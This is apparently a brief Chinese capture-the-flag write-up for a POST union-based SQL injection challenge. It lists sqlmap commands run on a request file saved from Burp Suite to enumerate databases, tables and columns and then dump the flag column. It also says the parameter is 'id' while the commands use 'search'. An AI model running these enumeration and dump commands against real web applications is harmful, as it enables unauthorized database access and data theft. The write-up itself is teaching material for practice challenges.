此题为 post联合注入
burpsuite拦截请求包，保存为txt格式

-r表示加载一个文件，-p指定参数，这里参数是id

爆数据库

python sqlmap.py -r D:_APP\sqlmap-master\a.txt -p search —dbs

爆表

python sqlmap.py -r D:_APP\sqlmap-master\a.txt -p search —tables

爆列

python sqlmap.py -r D:_APP\sqlmap-master\a.txt -p search —columns

爆字段

python sqlmap.py -r D:_APP\sqlmap-master\a.txt -D skctf -T fl4g -C skctf_flag —dump